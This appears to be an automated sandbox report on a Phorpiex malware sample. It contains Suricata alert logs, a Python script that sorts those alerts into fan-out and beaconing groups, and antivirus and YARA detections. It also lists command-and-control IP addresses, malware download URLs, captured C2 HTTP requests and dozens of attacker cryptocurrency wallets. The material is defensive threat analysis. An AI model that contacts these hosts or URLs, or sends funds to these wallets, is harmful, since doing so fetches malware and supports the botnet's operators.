2024-09-17T23:10:37.676890+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:40.456563+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:43.194117+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:46.044400+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:48.784910+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 185.215.113.66 | 80 | TCP
2024-09-17T23:10:53.491643+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 77.91.77.92 | 80 | TCP
2024-09-17T23:10:57.334445+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:01.041077+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:04.737217+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49776 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:08.444057+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49777 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:12.115917+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49779 | 77.91.77.92 | 80 | TCP
2024-09-17T23:11:16.142994+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49781 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:17.859805+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49782 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:24.665171+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49785 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:27.404856+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49786 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:30.236762+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49788 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:33.050771+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49789 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:35.900980+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49791 | 91.202.233.141 | 80 | TCP
2024-09-17T23:11:39.986361+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49793 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:41.832654+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49794 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:47.503983+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49797 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:50.288976+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49799 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:53.080321+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49800 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:55.821523+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49802 | 185.215.113.66 | 80 | TCP
2024-09-17T23:11:58.781922+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49803 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:03.475094+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49805 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:07.188452+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49807 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:10.900881+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49809 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:14.779580+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49810 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:18.495368+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49812 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:22.405916+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49814 | 77.91.77.92 | 80 | TCP
2024-09-17T23:12:26.510035+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49816 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:28.823664+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49817 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:35.986822+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49820 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:38.729098+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49821 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:41.467262+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49823 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:44.777939+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:47.533845+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49826 | 91.202.233.141 | 80 | TCP
2024-09-17T23:12:51.407501+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49828 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:54.150335+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49829 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:56.871465+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49831 | 185.215.113.66 | 80 | TCP
2024-09-17T23:12:59.607090+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49832 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:02.354191+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49834 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:05.072325+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49836 | 185.215.113.66 | 80 | TCP
2024-09-17T23:13:09.923770+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49837 | 77.91.77.92 | 80 | TCP
2024-09-17T23:13:13.779440+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49839 | 77.91.77.92 | 80 | TCP
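The Suricata tables above mix two behaviours that are worth separating during triage: single probes from one fixed local UDP port (59145) to a different host on 40500/udp each time, and repeated HTTP requests from ephemeral ports to the same three hosts on 80/tcp. The script below is an added example, not Joe Sandbox's or Suricata's own code: it parses a subset of rows copied from the tables (constructed inline, pipe-separated), groups them by signature, protocol and destination port, and labels each group as fan-out or beaconing. The thresholds in classify() are assumptions chosen for this sample, not signature settings; the fixed-source-port check reflects that a socket reused across every packet is a bound listener, which fits the report's "open a port and listen" signature.

```python
"""Triage of Suricata alert rows from this report: fan-out vs. beaconing.

Added example for this page; not Joe Sandbox's or Suricata's code.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime

# Subset of rows constructed from the report's Suricata tables (pipe-separated).
SAMPLE_ALERTS = """\
2024-09-17T23:09:18.095591+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 84.54.122.14 | 40500 | UDP
2024-09-17T23:09:23.161855+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 178.151.4.209 | 40500 | UDP
2024-09-17T23:09:33.235648+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 2.189.25.176 | 40500 | UDP
2024-09-17T23:09:38.241849+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 86.102.56.226 | 40500 | UDP
2024-09-17T23:09:43.241812+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 2.190.124.23 | 40500 | UDP
2024-09-17T23:09:58.255064+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.4 | 59145 | 105.106.52.97 | 40500 | UDP
2024-09-17T23:09:16.259431+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:17.984779+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 185.215.113.66 | 80 | TCP
2024-09-17T23:09:37.130578+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:40.900663+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 77.91.77.92 | 80 | TCP
2024-09-17T23:09:59.523347+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:01.236543+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 91.202.233.141 | 80 | TCP
2024-09-17T23:10:29.317891+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    severity: int
    classtype: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def parse_alert(line: str) -> Alert:
    """One pipe-separated row in the column order of the report's tables."""
    f = [x.strip() for x in line.split("|")]
    return Alert(
        ts=datetime.strptime(f[0], "%Y-%m-%dT%H:%M:%S.%f%z"),  # %z accepts +0200
        sid=int(f[1]), severity=int(f[2]), classtype=f[3],
        src_ip=f[4], src_port=int(f[5]), dst_ip=f[6], dst_port=int(f[7]), proto=f[8],
    )


def parse_alerts(text: str) -> list:
    return [parse_alert(line) for line in text.splitlines() if line.strip()]


def summarize(alerts) -> dict:
    """Per (sid, proto, dst_port): hit count, distinct targets, busiest target, source-port reuse."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a.sid, a.proto, a.dst_port)].append(a)
    out = {}
    for key, rows in groups.items():
        rows.sort(key=lambda r: r.ts)
        per_dst = Counter(r.dst_ip for r in rows)
        out[key] = {
            "hits": len(rows),
            "distinct_dst": len(per_dst),
            "max_hits_per_dst": max(per_dst.values()),
            # The same source port on every packet means one bound socket:
            # the sample listens there itself rather than opening ephemeral ports.
            "fixed_src_port": len({r.src_port for r in rows}) == 1,
            "span_s": (rows[-1].ts - rows[0].ts).total_seconds(),
        }
    return out


def classify(g: dict) -> str:
    """fan-out: many targets touched once each; beacon: few targets hit repeatedly (assumed thresholds)."""
    if g["distinct_dst"] >= 5 and g["max_hits_per_dst"] == 1:
        return "fan-out"
    if g["distinct_dst"] <= 3 and g["hits"] >= 2 * g["distinct_dst"]:
        return "beacon"
    return "other"


def c2_hosts(alerts) -> list:
    """Destination IPs of every beaconing group, sorted, as a block-list candidate."""
    summary = summarize(alerts)
    hosts = {a.dst_ip for a in alerts
             if classify(summary[(a.sid, a.proto, a.dst_port)]) == "beacon"}
    return sorted(hosts)


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for key, g in summarize(alerts).items():
        print(key, classify(g), g)
    print("C2 hosts:", c2_hosts(alerts))
```

On the rows above the UDP group (SID 2044077) comes out as fan-out with a fixed source port, and the TCP group (SID 2848295) as beaconing to exactly the three hosts that the extracted Phorpiex configuration lists as "C2 url", so the network view and the config extraction corroborate each other. Blocking the three HTTP hosts is the actionable part; the UDP peers change from run to run and are better handled by alerting on outbound 40500/udp from a workstation.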


                          AV Detection

                          Source: file.exeAvira: detected
                          Source: http://77.91.77.92/4Avira URL Cloud: Label: malware
                          Source: http://twizt.net/chnlk6.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk11.exeAvira URL Cloud: Label: phishing
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | Avira: detection malicious, Label: TR/Dldr.Agent.gqemd
                          Source: C:\Windows\sysmablsvr.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
                          Source: 1.2.sysmablsvr.exe.400000.0.unpack | Malware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://77.91.77.92/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw", "band1f05d98dvehkecw6ex3yd4pxqssw3uemx09sg2n", "bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Ge7amzjabAHdubjUYS2Cw84hNScLVRHmHg", "EQDYiebztC06Lpo9y1-m-g_bOsJ2KN3I-1mOgllNNIlIPZLi", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exe | ReversingLabs: Detection: 75%
                          Source: C:\Windows\sysmablsvr.exe | ReversingLabs: Detection: 84%
                          Source: file.exe | ReversingLabs: Detection: 84%
                          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Windows\sysmablsvr.exe | Joe Sandbox ML: detected
                          Source: file.exe | Joe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040C410
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040C410
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040C410 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040C410

                          Phishing

                          Source: Yara match | File source: file.exe, type: SAMPLE
                          Source: Yara match | File source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara match | File source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\158752420.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00406650
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406510
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00406650
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406510
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00406650 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00406650
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00406510 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406510

                          Networking

                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com 0_2_0040B010
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com 1_2_0040B010
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040B010 htons,socket,connect,getsockname, www.update.microsoft.com 2_2_0040B010
                          Source: unknown | Network traffic detected: IP country count 21
                          Source: Joe Sandbox View | IP Address: 91.202.233.141
                          Source: Joe Sandbox View | ASN Name: BRM-ASUZ
                          Source: Joe Sandbox View | ASN Name: ROSTELECOM-ASRU
                          Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 185.215.113.66:80
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.215.113.66 | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /PLTRESA HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.66
                          Source: unknown | TCP traffic detected without corresponding DNS query: 5.234.221.184
                          Source: unknown | TCP traffic detected without corresponding DNS query: 77.244.144.31
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401C50 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv | 0_2_00401C50
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.215.113.66 | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 185.215.113.66
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
